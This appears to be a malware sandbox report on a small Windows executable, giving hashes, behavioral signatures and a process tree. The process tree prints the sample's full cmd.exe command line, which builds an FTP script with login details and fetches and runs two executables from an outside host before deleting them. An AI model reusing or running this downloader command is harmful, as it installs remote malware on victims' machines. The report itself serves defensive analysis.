Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06/09/2024, 18:27
Static task
static1
Behavioral task
behavioral1
Sample
d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
-
Size
44KB
-
MD5
d0310b6b7e678c1100131d32fdffdf3b
-
SHA1
901eabee57673826bdd5aa7f33973ab75831f33b
-
SHA256
e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee
-
SHA512
5932d020f1c7cdf18bea240cd92e4159a468591b34fd224fdd9ff77432f0a78f218737496f2d18aed2af3e5b1151f5da357a38939da1ba4377c5d13f2ad7f56d
-
SSDEEP
768:nomSbguls/uNvGFJw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShI1:no9bfl8AvG/JoeBayDkRace
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 1768 cmd.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2160 wrote to memory of 2712 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 30 PID 2160 wrote to memory of 2712 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 30 PID 2160 wrote to memory of 2712 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 30 PID 2160 wrote to memory of 2712 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 30 PID 2712 wrote to memory of 2012 2712 Cmd.exe 32 PID 2712 wrote to memory of 2012 2712 Cmd.exe 32 PID 2712 wrote to memory of 2012 2712 Cmd.exe 32 PID 2712 wrote to memory of 2012 2712 Cmd.exe 32 PID 2160 wrote to memory of 1768 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 34 PID 2160 wrote to memory of 1768 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 34 PID 2160 wrote to memory of 1768 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 34 PID 2160 wrote to memory of 1768 2160 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\Cmd.exeCmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo get XiaoMing.exe %windir%\system32\Microsoft\XiaoMing.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&%windir%\system32\Microsoft\XiaoMing.exe&Del %windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\XiaoMing.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\ftp.exeftp -s:ftpdate.sys3⤵
- System Location Discovery: System Language Discovery
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Sc.bat""2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:1768
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
210B
MD5163f3ae3f34cca06baa478340b49025c
SHA17f8f173ed106a95b660969dd5c58ec2beb6ee67e
SHA256fc7dfbf59f55d47bd388dbafe8e9014ef81401d9e03f7a6f442490a84cc1658d
SHA5129eaa09842f86e49ee69a2b8e2861c5d373b83b90ecc2468922097db2520568f74e9b657c600c47e28d8c82fa192932f7acaf59979d73fb55cf67ac757c08a5e7
-
Filesize
152B
MD50fb17816f7c290e13419d68fa258edfa
SHA159b9dd4af7fa17ce896b878b55b07ddc4a7936f9
SHA256bc1cdde48c4f9a1c95233092cc2ab3c33bec604b4164fa5ed4e6eae994fdbb9c
SHA5125cd2261a9d7d201336a52eb8538d088289ea1161662fc796e47a8da23455218a2a52be004808756645fc59fd19341bd299a82be305f3ce774163192f4a25cc99